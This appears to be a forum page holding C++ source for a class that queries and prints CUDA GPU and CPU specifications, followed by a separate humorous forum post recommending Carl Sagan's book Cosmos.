            device_prop = new cudaDeviceProp[device_count + 1];
        } else {
            device_prop = new cudaDeviceProp[device_count];
        }
        for (dev = 0; dev < device_count; ++dev) {
            cudaGetDeviceProperties(&device_prop[dev], dev);
            if (dev == 0) {
                // This function call returns 9999 for both major & minor fields, if no CUDA capable devices are present
                if (device_prop[0].major == 9999 && device_prop[0].minor == 9999)
                    cout << "There is no device supporting CUDA." << endl;
                else if (device_count == 1)
                    cout << "There is 1 device supporting CUDA." << endl;
                else
                    cout << "There are " << device_count << " devices supporting CUDA" << endl;
            }
        }
    }
}

int SystemSpecs::getNumberOfCPUCores(void)
{
#ifdef WIN32
    /// windows
    return system_info.dwNumberOfProcessors;
#else
    /// linux
    return sysconf(_SC_NPROCESSORS_ONLN);
#endif
}

int SystemSpecs::getProcessorType(void)
{
#ifdef WIN32
    /// windows
    return system_info.dwProcessorType;
#else
    /// linux
    return 0;
#endif
}

void SystemSpecs::printGPUSpecs(void)
{
    cout << " CUDA Device Query (Runtime API) version (CUDART static linking)\n\n" << endl;
    for (dev = 0; dev < device_count; ++dev) {
        if (dev == 0) {
            // This function call returns 9999 for both major & minor fields, if no CUDA capable devices are present
            if (device_prop[0].major == 9999 && device_prop[0].minor == 9999)
                cout << "There is no device supporting CUDA." << endl;
            else if (device_count == 1)
                cout << "There is 1 device supporting CUDA." << endl;
            else
                cout << "There are " << device_count << " devices supporting CUDA" << endl;
        }
        cout << "\n Device " << dev << ":" << device_prop[dev].name << endl;
#if CUDART_VERSION >= 2020
        // Console log
        cudaDriverGetVersion(&driver_version);
        cout << " CUDA Driver Version: " << driver_version / 1000 << "." << driver_version % 100 << endl;
        cudaRuntimeGetVersion(&runtime_version);
        cout << " CUDA Runtime Version: " << runtime_version / 1000 << "." << runtime_version % 100 << endl;
#endif
        cout << " CUDA Capability Major/Minor version number: " << device_prop[dev].major << "." << device_prop[dev].minor << endl;
        sprintf(msg, " Total amount of global memory: %llu bytes\n", (unsigned long long) device_prop[dev].totalGlobalMem);
        cout << msg;   // the formatted line was never printed in the original
#if CUDART_VERSION >= 2000
        /*printf(" Multiprocessors x Cores/MP = Cores: %d (MP) x %d (Cores/MP) = %d (Cores)\n",
                 device_prop[dev].multiProcessorCount,
                 ConvertSMVer2Cores(device_prop[dev].major, device_prop[dev].minor),
                 ConvertSMVer2Cores(device_prop[dev].major, device_prop[dev].minor) * device_prop[dev].multiProcessorCount); */
#endif
        cout << " Total amount of constant memory: " << device_prop[dev].totalConstMem << " bytes." << endl;
        cout << " Total amount of shared memory per block: " << device_prop[dev].sharedMemPerBlock << " bytes." << endl;
        cout << " Total number of registers available per block: " << device_prop[dev].regsPerBlock << endl;
        cout << " Warp size: " << device_prop[dev].warpSize << endl;
        cout << " Maximum number of threads per block: " << device_prop[dev].maxThreadsPerBlock << endl;
        printf(" Maximum sizes of each dimension of a block: %d x %d x %d\n",
               device_prop[dev].maxThreadsDim[0], device_prop[dev].maxThreadsDim[1], device_prop[dev].maxThreadsDim[2]);
        printf(" Maximum sizes of each dimension of a grid: %d x %d x %d\n",
               device_prop[dev].maxGridSize[0], device_prop[dev].maxGridSize[1], device_prop[dev].maxGridSize[2]);
        cout << " Maximum memory pitch: " << device_prop[dev].memPitch << " bytes" << endl;
        cout << " Texture alignment: " << device_prop[dev].textureAlignment << " bytes" << endl;
        cout << " Clock rate: " << device_prop[dev].clockRate * 1e-6f << "GHz" << endl;   // clockRate is in kHz
#if CUDART_VERSION >= 2000
        printf(" Concurrent copy and execution: %s\n", device_prop[dev].deviceOverlap ? "Yes" : "No");
#endif
#if CUDART_VERSION >= 2020
        printf(" Run time limit on kernels: %s\n", device_prop[dev].kernelExecTimeoutEnabled ? "Yes" : "No");
        printf(" Integrated: %s\n", device_prop[dev].integrated ? "Yes" : "No");
        printf(" Support host page-locked memory mapping: %s\n", device_prop[dev].canMapHostMemory ? "Yes" : "No");
        printf(" Compute mode: %s\n",
               device_prop[dev].computeMode == cudaComputeModeDefault ?
                   "Default (multiple host threads can use this device simultaneously)" :
               device_prop[dev].computeMode == cudaComputeModeExclusive ?
                   "Exclusive (only one host thread at a time can use this device)" :
               device_prop[dev].computeMode == cudaComputeModeProhibited ?
                   "Prohibited (no host thread can use this device)" :
                   "Unknown");
#endif
#if CUDART_VERSION >= 3000
        printf(" Concurrent kernel execution: %s\n", device_prop[dev].concurrentKernels ? "Yes" : "No");
#endif
#if CUDART_VERSION >= 3010
        printf(" Device has ECC support enabled: %s\n", device_prop[dev].ECCEnabled ? "Yes" : "No");
#endif
#if CUDART_VERSION >= 3020
        printf(" Device is using TCC driver mode: %s\n", device_prop[dev].tccDriver ? "Yes" : "No");
#endif
    }
    cout << endl;

    // driver version
    sprofile_string += ", CUDA Driver Version = ";
#ifdef WIN32
    sprintf_s(cTemp, 10, "%d.%d", driver_version / 1000, driver_version % 100);
#else
    sprintf(cTemp, "%d.%d", driver_version / 1000, driver_version % 100);
#endif
    sprofile_string += cTemp;

    // Runtime version
    sprofile_string += ", CUDA Runtime Version = ";
#ifdef WIN32
    sprintf_s(cTemp, 10, "%d.%d", runtime_version / 1000, runtime_version % 100);
#else
    sprintf(cTemp, "%d.%d", runtime_version / 1000, runtime_version % 100);
#endif
    sprofile_string += cTemp;

    // Device count
    sprofile_string += ", NumDevs = ";
#ifdef WIN32
    sprintf_s(cTemp, 10, "%d", device_count);
#else
    sprintf(cTemp, "%d", device_count);
#endif
    sprofile_string += cTemp;

    // First 2 device names, if any
    for (dev = 0; dev < ((device_count > 2) ? 2 : device_count); ++dev) {
        cudaGetDeviceProperties(&device_prop[dev], dev);
        sprofile_string += ", Device = ";
        sprofile_string += device_prop[dev].name;
    }
    sprofile_string += "\n";

    // finish
    cout << "\n\nPASSED\n";
}

// The getters validate against device_count rather than the loop counter dev,
// which printGPUSpecs() leaves at min(2, device_count) and which would wrongly
// reject valid device IDs on a machine with more than two GPUs.
size_t SystemSpecs::getTotalConstantMemory(int deviceID)
{
    if (deviceID > device_count - 1 || deviceID < 0) {
        cout << "Invalid device specified" << endl;
        return 0;
    }
    return device_prop[deviceID].totalConstMem;
}

size_t SystemSpecs::getSharedMemPerBlock(int deviceID)
{
    if (deviceID > device_count - 1 || deviceID < 0) {
        cout << "Invalid device specified" << endl;
        return 0;
    }
    return device_prop[deviceID].sharedMemPerBlock;
}

size_t SystemSpecs::getTotalGlobalMemory(int deviceID)
{
    if (deviceID > device_count - 1 || deviceID < 0) {
        cout << "Invalid device specified" << endl;
        return 0;
    }
    return device_prop[deviceID].totalGlobalMem;
}

int SystemSpecs::getWarpSize(int deviceID)
{
    if (deviceID > device_count - 1 || deviceID < 0) {
        cout << "Invalid device specified" << endl;
        return 0;
    }
    return device_prop[deviceID].warpSize;
}

int SystemSpecs::getMaxThreadsPerBlock(int deviceID)
{
    if (deviceID > device_count - 1 || deviceID < 0) {
        cout << "Invalid device specified" << endl;
        return 0;
    }
    return device_prop[deviceID].maxThreadsPerBlock;
}

int SystemSpecs::getMaxThreads_x(int deviceID)
{
    if (deviceID > device_count - 1 || deviceID < 0) {
        cout << "Invalid device specified" << endl;
        return 0;
    }
    return device_prop[deviceID].maxThreadsDim[0];
}

int SystemSpecs::getMaxThreads_y(int deviceID)
{
    if (deviceID > device_count - 1 || deviceID < 0) {
        cout << "Invalid device specified" << endl;
        return 0;
    }
    return device_prop[deviceID].maxThreadsDim[1];
}

int SystemSpecs::getMaxThreads_z(int deviceID)
{
    if (deviceID > device_count - 1 || deviceID < 0) {
        cout << "Invalid device specified" << endl;
        return 0;
    }
    return device_prop[deviceID].maxThreadsDim[2];
}

int SystemSpecs::getMaxNumberOfBlocks_x(int deviceID)
{
    if (deviceID > device_count - 1 || deviceID < 0) {
        cout << "Invalid device specified" << endl;
        return 0;
    }
    return device_prop[deviceID].maxGridSize[0];
}

int SystemSpecs::getMaxNumberOfBlocks_y(int deviceID)
{
    if (deviceID > device_count - 1 || deviceID < 0) {
        cout << "Invalid device specified" << endl;
        return 0;
    }
    return device_prop[deviceID].maxGridSize[1];
}

int SystemSpecs::getMaxNumberOfBlocks_z(int deviceID)
{
    if (deviceID > device_count - 1 || deviceID < 0) {
        cout << "Invalid device specified" << endl;
        return 0;
    }
    return device_prop[deviceID].maxGridSize[2];
}

int SystemSpecs::getNumberOfGPUs(void)
{
    // device_count is what cudaGetDeviceCount() reported; dev is only a loop counter
    return device_count;
}
```
    1 point
  8. If you watch the Cosmos series on National Geographic then you know who Carl Sagan is. The book is great; it has nothing to do with the forum's topic, but it is one of the books that shape you to think "out of the box", something absolutely necessary in IT and its subfields; it simply develops your creativity. FAQ: 1. How much does it cost? Just 2 packs of cigarettes and a chewing gum. 2. Is it worth buying the book? YESSS 3. Why would I buy it? You learn a thing or two, you get in good with the staff guys, it's Neme's favourite book, he reads it every night before bed. Plus, when you're out having a beer with the guys, cracking some sunflower seeds, you say something cool, you look smart, you get yourself a girlfriend. That's it. Buy Cosmos
    1 point